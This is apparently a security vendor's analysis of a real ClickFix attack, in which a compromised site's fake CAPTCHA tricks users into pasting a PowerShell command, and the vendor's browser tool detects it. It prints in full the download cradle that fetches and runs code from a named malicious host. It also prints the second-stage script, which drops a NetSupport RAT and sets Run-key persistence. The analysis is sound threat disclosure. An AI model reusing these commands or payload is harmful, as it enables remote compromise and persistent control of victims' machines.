This article walks through a real-world ClickFix attack—encountered by a customer, detected and prevented by Keep Aware.

From Search Engine to Compromised Site

A user was using a search engine and clicked on a compromised site’s result. This site, injected with a script element sourced from an external domain, shows a visitor the legitimate web page as it checks if the user has visited the site before. If this is the first time visiting this site, the malicious script displays a fake CAPTCHA.

‍

Fake CAPTCHA, ClickFix Prompt

The fake CAPTCHA verification prompts the user to click the checkbox to ‘verify they are human’. Upon clicking the element, the malicious JavaScript populates the clipboard contents with malicious code and instructs the user to press the Windows key + R (to open the Windows Run dialog box), paste the clipboard contents, and press Enter.

‍

Below is the command that’s silently copied to the user’s clipboard. The initial PowerShell download cradle kicks off a series of malicious commands.

C:\WINDOWS\system32\cmd.exe /min /c powershell -NoP -ExecutionPolicy Bypass -w 1 -c "$p1='https://camplively';$p2='.com/all.php';$af=$p1+$p2; $xo=(Invoke-WebRequest -UseBasicParsing $af).Content; Invoke-Expression $xo"

‍

Malicious Commands, Subsequent Execution

Once executed, the initial PowerShell performs a series of downloads, de-obfuscation, assembling malware on the host machine, and setting up persistence. Refer to line 31 to see malware setting up persistence in the user’s Run registry key, meaning the malware will execute each time the victim user logs in to the machine.

1Add-Type -Name w -Namespace u -MemberDefinition '[DllImport("user32.dll")]public static extern bool bbilr(IntPtr hWnd, int n);' -ErrorAction SilentlyContinue;[u.w]::bbilr([Diagnostics.Process]::GetCurrentProcess().MainWindowHandle,0)|Out-Null;
2$XXQIU = "https://camplively.com/vusm.zip?lap=5036"
3$ONFPNWOZOBCMHQVEW = (New-Object System.Net.WebClient).DownloadData($XXQIU)
4$randomSubDir = -join ((65..90) + (97..122) + (48..57) | Get-Random -Count 8 | ForEach-Object {[char]$_})
5$BTWPVUZEAXOFTJU = "$env:ProgramData\$randomSubDir"
6if (-not (Test-Path $BTWPVUZEAXOFTJU)) {
7    New-Item -Path $BTWPVUZEAXOFTJU -ItemType Directory -Force | Out-Null
8}
9$TEJCLHYQ = New-Object System.IO.MemoryStream
10$TEJCLHYQ.Write($ONFPNWOZOBCMHQVEW, 0, $ONFPNWOZOBCMHQVEW.Length)
11$TEJCLHYQ.Position = 0
12Add-Type -AssemblyName System.IO.Compression
13$IJPOZWQKIOUXDDG = New-Object System.IO.Compression.ZipArchive($TEJCLHYQ, [System.IO.Compression.ZipArchiveMode]::Read)
14foreach ($VLFNPBZGMVVOIXVLIGRDP in $IJPOZWQKIOUXDDG.Entries) {
15    $GNOQUXITMTUJUZSARVMP = Join-Path $BTWPVUZEAXOFTJU $VLFNPBZGMVVOIXVLIGRDP.FullName
16    $QTSWHFILJDPRHAJUXR = Split-Path $GNOQUXITMTUJUZSARVMP -Parent
17    if (-not (Test-Path $QTSWHFILJDPRHAJUXR)) {
18        New-Item -Path $QTSWHFILJDPRHAJUXR -ItemType Directory -Force | Out-Null
19    }
20    if ($VLFNPBZGMVVOIXVLIGRDP.Length -gt 0) {
21        $VBHYKOCOQLYFL = $VLFNPBZGMVVOIXVLIGRDP.Open()
22        $VPEKSWI = [System.IO.File]::Create($GNOQUXITMTUJUZSARVMP)
23        $VBHYKOCOQLYFL.CopyTo($VPEKSWI)
24        $VPEKSWI.Close()
25        $VBHYKOCOQLYFL.Close()
26    }
27}
28$IJPOZWQKIOUXDDG.Dispose()
29$TEJCLHYQ.Dispose()
30$YSQGRKQCMYDNPBQT = "$BTWPVUZEAXOFTJU\client32.exe"
31sp HKCU:\Software\Microsoft\Windows\CurrentVersion\Run MySoftware $YSQGRKQCMYDNPBQT
32saps $YSQGRKQCMYDNPBQT
33

Code. The malicious PowerShell code that was downloaded and executed by the initial download cradle

NetSupportManager RAT; RATs and Stealers

This Joe’s Sandbox submission, from a different site, has the same attack chain, the same initial download cradle from camplively[.]com, and the final malware file is identified as NetSupportManager RAT.

‍

More broadly, however, multiple threat groups have employed the ClickFix tactic to gain unauthorized access to victims’ machines, deploying malware and remote access trojans (RATs), including AsyncRAT, Lumma Stealer, DarkGate malware, DanaBot stealer, and others.

‍

Browser Visibility Leads to Detection and Prevention

We became aware of this ClickFix attack because our ClickFix-related policy detected the suspicious commands and clipboard population. It prevented the user from inadvertently running malicious commands on their host device, making the attack unsuccessful.

‍

ClickFix attacks are happening within the browser context and have been seen on both malicious and compromised web pages. With native browser visibility, Keep Aware detects this type of clipboard manipulation by web pages and monitors its population for such suspicious code usage—effectively stopping this attempt for attackers to move laterally from browser to system.

For more information about ClickFix, check out our article, “ClickFix: The What, Why, Where, and How of it All”.

‍